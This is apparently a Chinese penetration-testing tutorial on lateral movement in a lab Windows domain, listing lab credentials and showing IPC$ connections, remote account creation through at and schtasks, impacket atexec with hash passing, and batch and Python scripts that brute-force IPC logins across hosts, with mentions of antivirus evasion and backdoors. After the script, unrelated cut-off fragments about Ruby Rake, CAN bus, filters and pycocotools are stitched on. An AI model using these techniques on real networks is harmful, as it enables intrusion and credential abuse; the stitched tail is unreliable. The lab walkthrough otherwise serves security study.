环境准备:
2008 r2 webserver
域内 web 服务器
本地管理员账号密码 :
.\administraotr:admin!@#45
当前机器域用户密码 :
god\webadmin:admin!@#45
2003 x86 fileserver
域内文件服务器
本地管理员账号密码 :
administrator : admin
当前机器域用户密码 :
god\fileadmin : Admin12345
2008 r2 x64 dc god.org
主域控机器
域管账号密码:
God\administrator : Admin12345
2012 sqlserver
域内数据库服务器
本地管理员账号密码 :
.\administrator:admin!@#45
当前机器域用户密码 :
god\dbadmin:admin!@#45
w7 x64 mary-pc
域内个人机
本地管理员账号密码 :
.\mary : admin
当前机器域用户密码 :
god\mary : admin!@#45
w8.1 x64 jack-pc
域内个人机
本地管理员账号密码 :
.\jack : admin
当前机器域用户密码 :
god\boss : Admin12345
windows 有一个任务计划程序,可以打开这个程序,创建定时的任务。windows 提供了两个命令行可以创建计划任务,分别是 at 和 schtasks。在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。
适用系统:
at:< Windows2012
schtasks:>=Windows2012
IPC$(Internet Process Connection)是共享 "命名管道 "的资源,它是一个用于进程间通信的开放式命名管道,通过提供一个可信的用户名和密码,连接双方可以建立一个安全通道并通过这个通道交换加密数据,从而实现对远程计算机的访问。
IPC 连接的简单使用:
建立 IPC 连接
net use \\IP地址\ipc$ "password" /user:"administrator"
通过 IPC 传文件
copy 文件名 \\IP地址\目录$
查看对方电脑时间
net time \\IP地址
定时运行程序
at \\IP地址 时间 文件名
断开 IPC 连接
net use \\IP地址 /del
建立 IPC 失败的原因:
创建 add.bat 文件,将下列命令写入,表示创建名为 zzz 密码为 Admin123$%. 的账户
net user zzz Admin123$%. /add
建立 ipc 连接
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator
拷贝执行文件到目标机器
copy add.bat \\192.168.3.21\c$
添加计划任务
at \\192.168.3.21 15:47 c:\add.bat
去域控查看发现 zzz 用户已被成功添加
建立ipc连接
net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator
复制文件到其 C 盘
copy add.bat \\192.168.3.32\c$
创建 adduser 任务对应执行文件
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F
运行 adduser 任务
schtasks /run /s 192.168.3.32 /tn adduser /i
执行命令
进入 win2012 主机查看,任务执行成功,zzz 用户被成功添加
以上两个命令都是建立在明文密码的传递,那哈希值该如何传递?
可以使用 impacket 中的 atexec.exe
优点:既可以用明文传输也可以使用hash传输,能自动提权
缺点:非官方软件,需要做免杀
exe 版本下载地址:https://github.com/maaaaz/impacket-examples-windows
atexec.exe 使用
atexec.exe ./[用户名]:[密码]@[IP] "[命令]"
atexec.exe [域名]/[用户名]:[密码]@[IP] "[命令]"
atexec.exe -hashes [密码的hash值] ./[用户名]@[IP] "[命令]"
如图明文和哈希值均可传递,并且连接后自动提权
以上两次演示都是建立在我们已经知道密码的情况下,实战过程使用mimikatz获取本机密码然后检测其它主机是否也使用了该密码,这需要我们去批量验证
什么是批处理文件?
批处理文件(batch file)包含一系列 DOS 命令,通常用于自动执行重复性任务。用户只需双击批处理文件便可执行任务,而无需重复输入相同指令。
批处理验证演示
(1)创建 ip 地址字典
探针域内存活主机地址信息
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL="
创建 ips.txt,将收集的ip地址写入
(2)创建批处理文件
创建名为 at_ip.bat 的文件,将如下命令写入
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator
该命令含义:对 ips.txt 中的每一个 ip 地址,使用 IPC 进行连接
(3)开始检测
执行创建好的at_ip.bat脚本
at_ip.bat
192.168.3.331是本机 ip 地址,从图中可以验证出192.168.3.29和192.168.3.32这两台主机的administrator 的密码为 admin!@#45
思路:
从上面的演示中,可以得到域横向移动的思路,获取到 web 服务器的 administrator 的密码之后,通过批量 ipc 连接,查看同一个域下有没有相同的密码,然后再在其它域内主机中使用 mimikatz 丰富密码字典,最终对域控制器进行密码爆破得到域控权限。
获取到某域主机权限-> minikatz得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做字典->尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令
为什么要使用脚本?
使用windows批处理命令,对多个变量进行遍历较为麻烦,而我们需要对 ip、用户名、密码、哈希一起爆破,就需要利用脚本进行批量处理。
思路:
使用 python 写脚本,利用第三方软件将其转换为 exe 文件,再对其进行免杀,上传至
我们控制的主机运行,实现批量验证
python 代码实例
import os,time
ips={
#域内ip地址
}
users={
#收集的用户名
}
passs={
#收集的密码
}
for ip in ips:
for user in users:
for mima in passs:
exec="net use \"+ "\"+ip+'\ipc$ '+mima+' /user:god\'+user
print('--->'+exec+'<---')
os.system(exec)
我试图在一个项目中使用rake,如果我把所有东西都放到Rakefile中,它会很大并且很难读取/找到东西,所以我试着将每个命名空间放在lib/rake中它自己的文件中,我添加了这个到我的rake文件的顶部:Dir['#{File.dirname(__FILE__)}/lib/rake/*.rake'].map{|f|requiref}它加载文件没问题,但没有任务。我现在只有一个.rake文件作为测试,名为“servers.rake”,它看起来像这样:namespace:serverdotask:testdoputs"test"endend所以当我运行rakeserver:testid时
我的代码目前看起来像这样numbers=[1,2,3,4,5]defpop_threepop=[]3.times{pop有没有办法在一行中完成pop_three方法中的内容?我基本上想做类似numbers.slice(0,3)的事情,但要删除切片中的数组项。嗯...嗯,我想我刚刚意识到我可以试试slice! 最佳答案 是numbers.pop(3)或者numbers.shift(3)如果你想要另一边。 关于ruby-多次弹出/移动ruby数组,我们在StackOverflow上找到一
如何使用RSpec::Core::RakeTask初始化RSpecRake任务?require'rspec/core/rake_task'RSpec::Core::RakeTask.newdo|t|#whatdoIputinhere?endInitialize函数记录在http://rubydoc.info/github/rspec/rspec-core/RSpec/Core/RakeTask#initialize-instance_method没有很好的记录;它只是说:-(RakeTask)initialize(*args,&task_block)AnewinstanceofRake
当我在我的Rails应用程序根目录中运行rakedoc:app时,API文档是使用/doc/README_FOR_APP作为主页生成的。我想向该文件添加.rdoc扩展名,以便它在GitHub上正确呈现。更好的是,我想将它移动到应用程序根目录(/README.rdoc)。有没有办法通过修改包含的rake/rdoctask任务在我的Rakefile中执行此操作?是否有某个地方可以查找可以修改的主页文件的名称?还是我必须编写一个新的Rake任务?额外的问题:Rails应用程序的两个单独文件/README和/doc/README_FOR_APP背后的逻辑是什么?为什么不只有一个?
我从Ubuntu服务器上的RVM转移到rbenv。当我使用RVM时,使用bundle没有问题。转移到rbenv后,我在Jenkins的执行shell中收到“找不到命令”错误。我内爆并删除了RVM,并从~/.bashrc'中删除了所有与RVM相关的行。使用后我仍然收到此错误:rvmimploderm~/.rvm-rfrm~/.rvmrcgeminstallbundlerecho'exportPATH="$HOME/.rbenv/bin:$PATH"'>>~/.bashrcecho'eval"$(rbenvinit-)"'>>~/.bashrc.~/.bashrcrbenvversions
目录前言滤波电路科普主要分类实际情况单位的概念常用评价参数函数型滤波器简单分析滤波电路构成低通滤波器RC低通滤波器RL低通滤波器高通滤波器RC高通滤波器RL高通滤波器部分摘自《LC滤波器设计与制作》,侵权删。前言最近需要学习放大电路和滤波电路,但是由于只在之前做音乐频谱分析仪的时候简单了解过一点点运放,所以也是相当从零开始学习了。滤波电路科普主要分类滤波器:主要是从不同频率的成分中提取出特定频率的信号。有源滤波器:由RC元件与运算放大器组成的滤波器。可滤除某一次或多次谐波,最普通易于采用的无源滤波器结构是将电感与电容串联,可对主要次谐波(3、5、7)构成低阻抗旁路。无源滤波器:无源滤波器,又称
最近在学习CAN,记录一下,也供大家参考交流。推荐几个我觉得很好的CAN学习,本文也是在看了他们的好文之后做的笔记首先是瑞萨的CAN入门,真的通透;秀!靠这篇我竟然2天理解了CAN协议!实战STM32F4CAN!原文链接:https://blog.csdn.net/XiaoXiaoPengBo/article/details/116206252CAN详解(小白教程)原文链接:https://blog.csdn.net/xwwwj/article/details/105372234一篇易懂的CAN通讯协议指南1一篇易懂的CAN通讯协议指南1-知乎(zhihu.com)视频推荐CAN总线个人知识总
深度学习部署:Windows安装pycocotools报错解决方法1.pycocotools库的简介2.pycocotools安装的坑3.解决办法更多Ai资讯:公主号AiCharm本系列是作者在跑一些深度学习实例时,遇到的各种各样的问题及解决办法,希望能够帮助到大家。ERROR:Commanderroredoutwithexitstatus1:'D:\Anaconda3\python.exe'-u-c'importsys,setuptools,tokenize;sys.argv[0]='"'"'C:\\Users\\46653\\AppData\\Local\\Temp\\pip-instal
我写了一个非常简单的rake任务来尝试找到这个问题的根源。namespace:foodotaskbar::environmentdoputs'RUNNING'endend当在控制台中执行rakefoo:bar时,输出为:RUNNINGRUNNING当我执行任何rake任务时会发生这种情况。有没有人遇到过这样的事情?编辑上面的rake任务就是写在那个.rake文件中的所有内容。这是当前正在使用的Rakefile。requireFile.expand_path('../config/application',__FILE__)OurApp::Application.load_tasks这里
我完全不是程序员,正在学习使用Ruby和Rails框架进行编程。我目前正在使用Ruby1.8.7和Rails3.0.3,但我想知道我是否应该升级到Ruby1.9,因为我真的没有任何升级的“遗留”成本。缺点是什么?我是否会遇到与普通gem的兼容性问题,或者甚至其他我不太了解甚至无法预料的问题? 最佳答案 你应该升级。不要坚持从1.8.7开始。如果您发现不支持1.9.2的gem,请避免使用它们(因为它们很可能不被维护)。如果您对gem是否兼容1.9.2有任何疑问,您可以在以下位置查看:http://www.railsplugins.or